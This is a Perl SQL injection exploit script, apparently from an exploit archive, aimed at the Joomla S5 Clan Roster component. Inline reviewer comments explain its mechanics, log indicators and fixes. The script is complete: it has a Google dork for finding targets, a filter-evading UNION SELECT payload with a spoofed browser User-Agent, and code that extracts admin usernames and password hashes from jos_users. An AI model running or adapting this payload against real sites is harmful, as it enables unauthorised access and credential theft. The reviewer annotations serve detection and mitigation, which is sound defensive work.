| 1 | #!/usr/bin/perl | |
| 2 | #Exploit title: Joomla S5 Clan Roster com_s5clanroster SQL Injection exploit | |
| 3 | #Google Dork: inurl:index.php?option=com_s5clanroster& | |
| 4 | #Vendor HomePage: http://www.joomla.org/ | |
# Reviewer summary (defensive reading of this listing):
#   The script sends one HTTP GET to <site>/index.php with
#   option=com_s5clanroster and an `id` value that carries a UNION SELECT
#   against the jos_users table. It then prints the first run of 32 hex
#   digits found in the response body.
#   For that to return data, the component would have to place `id` into
#   its SQL text without casting or binding it. The component source is not
#   shown here, so treat that as the presumed root cause.
#   Mitigation on the component side: cast `id` to an integer or bind it as
#   a query parameter. For a site owner: update or uninstall the extension,
#   and if requests of this shape appear in access logs, treat the stored
#   password hashes as exposed and reset the affected credentials.
# NOTE(review): the vendor line above points at joomla.org, but
#   com_s5clanroster is an add-on component rather than part of Joomla core;
#   confirm the actual publisher before reporting.
# NOTE(review): the script has no `use strict` / `use warnings`; $code,
#   $agent, $host, $ok and $ok1 below are undeclared package globals.

# Both screen-clear commands run unconditionally; whichever one does not
# exist on the current platform simply fails and its result is ignored.
| 5 | system("clear");
| |
| 6 | system("cls");
| |
| 7 | print "=========================================================\n"; | |
| 8 | print "* Joomla S5 Clan Roster com_s5clanroster SQL Injection *\n"; | |
| 9 | print "* Coded by TheLooper *\n"; | |
| 10 | print "* Greetz: To All My Friends <3 *\n"; | |
| 11 | print "=========================================================\n"; | |
| 12 | sleep 1; | |
# `use` is resolved at compile time, so its position after the banner does
# not matter. HTTP::Request (used further down) is never loaded explicitly;
# the script relies on LWP::UserAgent pulling it in.
| 13 | use LWP::UserAgent; | |
| 14 | print "Enter the target site: "; | |
# The base URL is read from STDIN and used as typed: no scheme check and no
# validation before it is concatenated into the request URL.
| 15 | chomp(my $target=<STDIN>); | |
# Query-string suffix appended to the `id` parameter. What a log or WAF
# rule has to recognise:
#   %27            URL-encoded single quote
#   /*!50000...*/  MySQL version-conditional comments: the server executes
#                  the enclosed keyword on MySQL >= 5.0.0, while a naive
#                  keyword filter sees only a comment. Together with the
#                  mixed-case UnIoN/SeLeCt this is filter evasion, so
#                  detection must normalise case and inline comments
#                  before matching.
#   0x3a           hex literal for ':' (separator between the two columns)
#   ,222           constant second column; presumably the component's own
#                  query selects two columns (not verifiable from here)
#   jos_users      users table under the legacy default Joomla prefix; a
#                  custom prefix changes the name but is not a fix
#   --%20-         SQL line comment that discards the rest of the statement
| 16 | $code="%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(username,0x3a,password),222+from+jos_users--%20-"; | |
| 17 | $agent = LWP::UserAgent->new() or die "[!] Error while processing"; | |
# Replaces the default libwww-perl User-Agent with a browser-like string, so
# blocking on the libwww-perl UA will not catch this client. The exact
# string (rv:7.0.1 paired with "Firefox/7.0.12011") is not a version a real
# browser sends and can be searched for verbatim in access logs.
| 18 | $agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
| |
# Full request URL. Log indicator: option=com_s5clanroster with
# view=s5clanroster, layout=category, task=category and a non-numeric `id`.
# A legitimate category id is presumably numeric; verify against the
# component before alerting on that alone.
| 19 | $host= $target. "/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null".$code; | |
# Single GET; the HTTP status is never checked, so error pages are scanned
# the same way as successful responses.
| 20 | $ok = $agent->request(HTTP::Request->new(GET=>$host)); | |
# Matches the first run of 32 hex digits anywhere in the body. That is the
# shape of an MD5 digest, but any 32-hex token in the page (for example a
# form token or an asset hash) matches too, so a "found" result is not
# proof that the site is vulnerable.
# The pattern has one capture group only: $2 in the message below is never
# set and prints as an empty string. What gets printed is a hash-shaped
# string, not a plaintext password, despite the label.
| 21 | $ok1 = $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
| |
| 22 | print "[+] Password found --> $1\n$2\n"; | |
| 23 | sleep 1; | |
| 24 | } | |
| 25 | else | |
| 26 | {
| |
| 27 | print "Password not found \n"; | |
| 28 | } |